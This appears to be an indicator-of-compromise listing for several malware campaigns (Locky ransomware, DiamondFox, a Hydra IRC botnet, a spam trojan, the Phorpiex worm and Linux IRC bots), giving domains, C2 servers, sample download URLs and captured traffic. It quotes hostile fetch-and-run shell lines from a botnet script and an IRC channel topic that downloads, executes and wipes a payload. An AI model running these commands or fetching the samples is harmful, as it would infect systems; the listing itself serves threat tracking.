
eiqdfngoghledf.pw (Locky Ransomware Hosted In France, ASN 16276 OVH SAS)

Domains: eiqdfngoghledf.pw, emijtrjhnrddoxr.org, ofsrsykqd.pl, whrilkltsrvggxsj.click, fphnnnkaei.org, ntdvwoousyc.pl, kmarheql.info, pobqrwoxltcy.pl, eyetuesq.ru, djxmxiahj.biz, kdyoevbcxy.su, ajqjdjblfdjti.work, clsfnbwpekrxmcj.xyz, qkpdsttc.pw, ihxkjsgmloij.work, rhiqtgs.info, jbtnnvqkwakpitxk.pl, awcweto.xyz

URLs:
hxxp://93.170.131.108/submit.php
hxxp://5.135.76.18/submit.php
hxxp://82.146.37.200/submit.php

Sample: hxxp://mundogostoso.com.br/zFN1Lg.exe

Hosting info: http://whois.domaintools.com/5.135.76.18

jcngtodnjlcr.it (Locky Ransomware Hosted In United Kingdom, Belfast, Barefruit Ltd.)

Domains: jcngtodnjlcr.it, mneqmmunsee.us, xdryy.uk, awrobhtsxpmcro.tf, boapooihhqkthvm.de, gfyttdu.ru, dpirlysijsbyy.pm, whetujmpw.pm

POSTs files to a webserver:
"POST /main.php HTTP/1.1
Host: 5.34.183.136"

Sample: hxxp://bitmeyenkartusistanbul.com/system/logs/87h754/fXBvKHcBd.exe

Hosting info: http://whois.domaintools.com/92.242.144.2

poweroftech.com (DiamondFox Hosted In Russian Federation, Moscow, Mediaserviceplus Ltd.)

Resolved: [ poweroftech.com ] to [ 193.0.200.89 ]

Panel: hxxp://poweroftech.com/poweroftech.com/soul/

Sample: hxxp://www.gramer.pro/get/run.exe

Other samples: hxxp://www.gramer.pro/get/

Different folders: hxxp://poweroftech.com/

Loader.bat: hxxp://poweroftech.com/sin/ or direct link hxxp://poweroftech.com/sin/loader.bat

Hosting info: http://whois.domaintools.com/193.0.200.89

Hydra Botnet (Hosted In France, Paris, Hexatom)

Around 100 Hydra bots inside.

Server: 149.91.89.253:6667
Channel: #perls

URLs:
hxxp://208.67.1.142/ddos.pl
hxxp://208.67.1.142/hack/ (you can get the rest of the files here)

Binary.sh:
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmipsel && chmod +x telmipsel && ./telmipsel
cd /tmp && wget -q hxxp://208.67.1.142/hack/telmips && chmod +x telmips && ./telmips
cd /tmp && wget -q hxxp://208.67.1.142/hack/telsh4 &&

Trojan.GenericKD.3018192 (Hosted In Germany, Falkenstein, Hetzner Online GmbH)

Email spam via these SMTP servers:
"cdptpa-pub-iedge-vip.email.rr.com"
"smtp.orange.fr"
"smtp.sina.com"
"smtp.googlemail.com"
"smtp.tiscali.co.uk"
"out.alice.it"

Servers used to spam:
"173.194.195.16:25"
"78.47.198.134:80"
"62.24.139.11:25"
"107.14.166.70:25"
"193.252.22.86:25"
"82.57.200.132:25"
"202.108.6.242:25"

Downloaded files:
"GET /libeay32.dll HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent: Mozilla/4.0 (compatible; Synapse)"

"GET /ssleay32.dll HTTP/1.0
Host: 78.47.198.134
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=i9m4iaif2bqmlrku5ge1mev8e6
User-Agent:

Worm Porphiex

Domains used by the worm:
"tuhocphp.net" "milomaine.org" "milwaukeearmedforcesweek.org" "millplainlibrary.org" "mimemoria.org" "militarytrial.org" "milesbuckinghamlaw.org" "millcreek-construction.org" "milpitasvoter.org" "milkingshadows.org" "millionairemakers.org" "millgroup.org" "mimedrive.org" "millriverwatershed.org" "minaple.org" "millercountyga.org" "milwaukeelandmarks.org" "milyonbabies.org" "military-law.org" "mindfullife.org"

Servers used by the worm:
"220.181.87.80:5050" "112.78.4.160:80" "213.186.33.5:25" "82.165.73.126:25" "199.34.228.68:25" "81.169.145.84:25" "184.168.221.20:25" "82.165.100.254:25" "92.61.157.100:25" "184.168.221.53:25" "173.255.220.88:25" "82.165.100.228:25" "184.168.221.76:25" "198.11.204.78:25" "143.95.43.78:25" "104.25.88.29:25" "74.208.60.100:25" "66.39.35.237:25" "50.63.202.34:25" "50.63.202.18:25"

Downloaded files:

comment.dyn.mk (Linux IRC Bots Hosted In Korea, Republic Of, Seoul, SK Broadband Co Ltd)

Resolved: [ comment.dyn.mk ] to [ 1.234.46.241 ] (maybe a hacked machine)

Bot configuration:
$server = 'comment.dyn.mk' unless $server;
my $port = '6667';

IRC log (around 100 bots inside):
[11:00] * Now talking in #kill
[11:00] * Topic is 'wget hxxp://cmt.ucoz.com/dyn.pdf;perl dyn.pdf;perl dyn.pdf;perl dyn.pdf;rm -rf dyn.pdf;history -c '
[11:00] * Set by anonplus on Thu Jan 07 17:06:34 U